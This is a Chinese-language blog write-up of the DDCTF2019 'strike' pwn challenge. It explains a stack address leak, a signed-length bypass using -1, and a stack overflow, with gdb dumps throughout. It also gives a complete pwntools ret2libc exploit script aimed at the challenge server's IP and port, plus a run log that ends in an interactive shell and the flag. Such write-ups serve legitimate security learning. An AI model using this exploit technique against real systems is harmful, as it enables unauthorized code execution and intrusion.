DDCTF2019 [Pwn]strike

前言

Pwn菜鸡比赛的时候不会做,时间都花在Web题上面了,只能比赛后来复现了。

查看保护,基本没有什么保护:

1
2
3
4
5
6
[*] '/home/aluvion/Desktop/xpwn'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

IDA反编译,主要漏洞代码如下:

1
2
3
4
5
6
7
8
9
10
int __cdecl sub_80485DB(FILE *stream, FILE *a2)
{
  int v2; // eax@1
  char buf; // [sp+0h] [bp-48h]@1

  printf("Enter username: ");
  v2 = fileno(stream);
  read(v2, &buf, 0x40u);
  return fprintf(a2, "Hello %s", &buf);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
int __cdecl main(int a1)
{
  int v1; // eax@4
  char buf; // [sp+0h] [bp-4Ch]@4
  size_t nbytes; // [sp+40h] [bp-Ch]@1
  int *v5; // [sp+48h] [bp-4h]@1

  v5 = &a1;
  setbuf(stdout, 0);
  sub_80485DB(stdin, stdout);
  sleep(1u);
  printf("Please set the length of password: ");
  nbytes = sub_804862D();
  if ( (signed int)nbytes > 63 )
  {
    puts("Too long!");
    exit(1);
  }
  printf("Enter password(lenth %u): ", nbytes);
  v1 = fileno(stdin);
  read(v1, &buf, nbytes);
  puts("All done, bye!");
  return 0;
}

漏洞点有三个:

  • fprintf(a2, “Hello %s”, &buf) 字符串没有\x00结尾,可以用栈溢出来泄露地址
  • 限制输入长度的时候,使用的是有符号数,输入的时候使用的是无符号数,没有进行负数检查,我们输入负数即可获得一个相当长的输入长度上限
  • read(v1, &buf, nbytes) 栈溢出漏洞

首先我们用gdb调试,看看栈里面有什么值得泄露的数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
Breakpoint 1, 0x08048610 in ?? ()
gdb-peda$ stack 25
0000| 0xffffd4a0 --> 0x0 
0004| 0xffffd4a4 --> 0xffffd4b0 ("Twings\n\bX\202\004\b")
0008| 0xffffd4a8 --> 0x40 ('@')
0012| 0xffffd4ac --> 0xffffd528 --> 0xf7e0cdc8 --> 0x2b76 ('v+')
0016| 0xffffd4b0 ("Twings\n\bX\202\004\b")
0020| 0xffffd4b4 --> 0x80a7367 
0024| 0xffffd4b8 --> 0x8048258 --> 0x57 ('W')
0028| 0xffffd4bc --> 0x0 
0032| 0xffffd4c0 --> 0xf7ffda74 --> 0xf7fd3470 --> 0xf7ffd918 --> 0x0 
0036| 0xffffd4c4 --> 0xf7e0ccc8 --> 0x29d0 
0040| 0xffffd4c8 --> 0xf7e6021b (<__GI__IO_setbuffer+11>:	add    ebx,0x151de5)
0044| 0xffffd4cc --> 0x0 
0048| 0xffffd4d0 --> 0xf7fb2000 --> 0x1b1db0 
0052| 0xffffd4d4 --> 0xf7fb2000 --> 0x1b1db0 
0056| 0xffffd4d8 --> 0xffffd568 --> 0x0 
0060| 0xffffd4dc --> 0xf7e66005 (<setbuf+21>:	add    esp,0x1c)
0064| 0xffffd4e0 --> 0xf7fb2d60 --> 0xfbad2887 
0068| 0xffffd4e4 --> 0x0 
0072| 0xffffd4e8 --> 0x2000 ('')
0076| 0xffffd4ec --> 0xf7e65ff0 (<setbuf>:	sub    esp,0x10)
0080| 0xffffd4f0 --> 0xf7fb2d60 --> 0xfbad2887 
0084| 0xffffd4f4 --> 0xf7ffd918 --> 0x0 
0088| 0xffffd4f8 --> 0xffffd568 --> 0x0 
0092| 0xffffd4fc --> 0x80486a3 (add    esp,0x10)
0096| 0xffffd500 --> 0xf7fb25a0 --> 0xfbad2088 
gdb-peda$ p $ebp
$25 = (void *) 0xffffd4f8

可以看到这么一行:

1
0060| 0xffffd4dc --> 0xf7e66005 (<setbuf+21>:	add    esp,0x1c)

所以我们只要用数据一直覆盖掉 0xffffd4d4 地址处的 \x00 ,我们就可以将 setbuf 函数地址 +21 后的地址泄露出来,然后计算 libc 的偏移。

同时我们还可以关注到一点:0xffffd4d8 地址处的数据和 ebp 寄存器中的数据是一样的,所以我们还同时可以得到 mian 函数的基地址。

但是题目没有简单到,计算出偏移之后就可以直接利用第二个栈溢出 getshell 的地步:

1
2
3
4
5
6
7
8
0x804872d:	call   0x8048470 <puts@plt>
0x8048732:	add    esp,0x10
0x8048735:	mov    eax,0x0
0x804873a:	lea    esp,[ebp-0x8]
0x804873d:	pop    ecx
0x804873e:	pop    ebx
0x804873f:	pop    ebp
0x8048740:	lea    esp,[ecx-0x4]

可以看到,main 函数最后用 lea 指令做了一下简单的栈溢出防护,如果我们在溢出的过程中破坏了 ebp - 0x8 地址处的数据,就会导致 esp 寄存器错误,最后程序报错退出。所以我们需要在栈溢出的时候,修复这个地方的数据。

同样是 gdb 调试:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0xffffffff 
ECX: 0xffffffff 
EDX: 0xf7fb3870 --> 0x0 
ESI: 0xf7fb2000 --> 0x1b1db0 
EDI: 0xf7fb2000 --> 0x1b1db0 
EBP: 0xffffd568 --> 0x0 
ESP: 0xffffd510 --> 0x0 
EIP: 0x804873a (lea    esp,[ebp-0x8])
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804872d:	call   0x8048470 <puts@plt>
   0x8048732:	add    esp,0x10
   0x8048735:	mov    eax,0x0
=> 0x804873a:	lea    esp,[ebp-0x8]
   0x804873d:	pop    ecx
   0x804873e:	pop    ebx
   0x804873f:	pop    ebp
   0x8048740:	lea    esp,[ecx-0x4]
[------------------------------------stack-------------------------------------]
0000| 0xffffd510 --> 0x0 
0004| 0xffffd514 --> 0xffffd5b4 --> 0x5f0267f1 
0008| 0xffffd518 --> 0xf7fb2000 --> 0x1b1db0 
0012| 0xffffd51c ("Twings\n\377/")
0016| 0xffffd520 --> 0xff0a7367 
0020| 0xffffd524 --> 0x2f ('/')
0024| 0xffffd528 --> 0xf7e0cdc8 --> 0x2b76 ('v+')
0028| 0xffffd52c --> 0xf7fd31b0 --> 0xf7e00000 --> 0x464c457f 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 2, 0x0804873a in ?? ()
gdb-peda$ p $ebp
$26 = (void *) 0xffffd568
gdb-peda$ p $ebp - 8
$27 = (void *) 0xffffd560
gdb-peda$ p *0xffffd560
$28 = 0xffffd580
gdb-peda$ p 0xffffd560 - 0xffffd51c
$29 = 0x44
gdb-peda$ p 0xffffd580 - 0xffffd568
$30 = 0x18

我们的输入的地址为 0xffffd51c ,要修改的地址为 0xffffd560 ,偏移为 0x44;数据为 0xffffd580 ,跟 ebp 寄存器中地址(main 函数的基地址)的偏移为 0x18。

我们继续调试得到 main 函数的返回地址来覆盖:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xffffd580 --> 0x1 
EDX: 0xf7fb3870 --> 0x0 
ESI: 0xf7fb2000 --> 0x1b1db0 
EDI: 0xf7fb2000 --> 0x1b1db0 
EBP: 0x0 
ESP: 0xffffd57c --> 0xf7e18637 (<__libc_start_main+247>:	add    esp,0x10)
EIP: 0x8048743 (ret)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804873e:	pop    ebx
   0x804873f:	pop    ebp
   0x8048740:	lea    esp,[ecx-0x4]
=> 0x8048743:	ret    
   0x8048744:	xchg   ax,ax
   0x8048746:	xchg   ax,ax
   0x8048748:	xchg   ax,ax
   0x804874a:	xchg   ax,ax
[------------------------------------stack-------------------------------------]
0000| 0xffffd57c --> 0xf7e18637 (<__libc_start_main+247>:	add    esp,0x10)
0004| 0xffffd580 --> 0x1 
0008| 0xffffd584 --> 0xffffd614 --> 0xffffd77b ("/home/aluvion/Desktop/xpwn")
0012| 0xffffd588 --> 0xffffd61c --> 0xffffd796 ("LC_PAPER=zh_CN.UTF-8")
0016| 0xffffd58c --> 0x0 
0020| 0xffffd590 --> 0x0 
0024| 0xffffd594 --> 0x0 
0028| 0xffffd598 --> 0xf7fb2000 --> 0x1b1db0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048743 in ?? ()
gdb-peda$ p 0xffffd57c - 0xffffd51c
$31 = 0x60

可以看到返回地址为 0xffffd57c ,跟我们的输入的偏移为 0x60 ,我们可以写出脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from pwn import *

elf = ELF("../xpwn")
libc = ELF("../libc.so.6")
context.log_level = "debug"

system_libc = libc.symbols["system"]
setbuf_libc = libc.symbols["setbuf"]
bin_sh_libc = libc.search("/bin/sh").next()

# target = process("../xpwn")
target = remote("116.85.48.105", 5005)

target.recvuntil("Enter username: ")
target.sendline("p" * 36)
target.recvuntil("p" * 36)
target.recv(4)
main_ebp = u32(target.recv(4))
setbuf_addr = u32(target.recv(4)) - 21
print "main ebp: " + hex(main_ebp)
print "setbuf addr: " + hex(setbuf_addr)
pause()

target.recvuntil("password: ")
target.sendline('-1')

system_addr = setbuf_addr - setbuf_libc + system_libc
bin_sh_addr = setbuf_addr - setbuf_libc + bin_sh_libc
payload = "p" * 0x44 + p32(main_ebp + 0x18)
payload += "p" * (0x60 - 0x44 - 0x04) + p32(system_addr)
payload += "a" * 0x04 + p32(bin_sh_addr)
target.recvuntil("): ")
target.send(payload)

target.interactive()
target.close()

结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
root@Aluvion:/home/aluvion/Desktop/二进制# python dd2019.py 
[*] '/home/aluvion/Desktop/xpwn'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[*] '/home/aluvion/Desktop/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 116.85.48.105 on port 5005: Done
[DEBUG] Received 0x10 bytes:
    'Enter username: '
[DEBUG] Sent 0x25 bytes:
    'pppppppppppppppppppppppppppppppppppp\n'
[DEBUG] Received 0x3a bytes:
    00000000  48 65 6c 6c  6f 20 70 70  70 70 70 70  70 70 70 70  │Hell│o pp│pppp│pppp│
    00000010  70 70 70 70  70 70 70 70  70 70 70 70  70 70 70 70  │pppp│pppp│pppp│pppp│
    00000020  70 70 70 70  70 70 70 70  70 70 0a f0  6e f7 f8 1b  │pppp│pppp│pp··│n···│
    00000030  92 ff 65 44  5a f7 60 fd  6e f7                     │··eD│Z·`·│n·│
    0000003a
main ebp: 0xff921bf8
setbuf addr: 0xf75a4450
[*] Paused (press any to continue)
[DEBUG] Received 0x23 bytes:
    'Please set the length of password: '
[DEBUG] Sent 0x3 bytes:
    '-1\n'
[DEBUG] Received 0x22 bytes:
    'Enter password(lenth 4294967295): '
[DEBUG] Sent 0x6c bytes:
    00000000  70 70 70 70  70 70 70 70  70 70 70 70  70 70 70 70  │pppp│pppp│pppp│pppp│
    *
    00000040  70 70 70 70  10 1c 92 ff  70 70 70 70  70 70 70 70  │pppp│····│pppp│pppp│
    00000050  70 70 70 70  70 70 70 70  70 70 70 70  70 70 70 70  │pppp│pppp│pppp│pppp│
    00000060  40 99 57 f7  61 61 61 61  2b 80 69 f7               │@·W·│aaaa│+·i·││
    0000006c
[*] Switching to interactive mode
[DEBUG] Received 0xe bytes:
    'All done, bye!'
All done, bye![DEBUG] Received 0x1 bytes:
    '\n'

$ cat flag
[DEBUG] Sent 0x9 bytes:
    'cat flag\n'
[DEBUG] Received 0x23 bytes:
    'DDCTF{s0_3asy_St4ck0verfl0w_r1ght?}'
DDCTF{s0_3asy_St4ck0verfl0w_r1ght?}$ 
[*] Interrupted
[*] Closed connection to 116.85.48.105 port 5005

Orz

#CTF #Pwn
DDCTF2019 [Pwn]strike
http://yoursite.com/2019/04/23/DDCTF2019-Pwn-strike/
作者
Aluvion
发布于
2019年4月23日
许可协议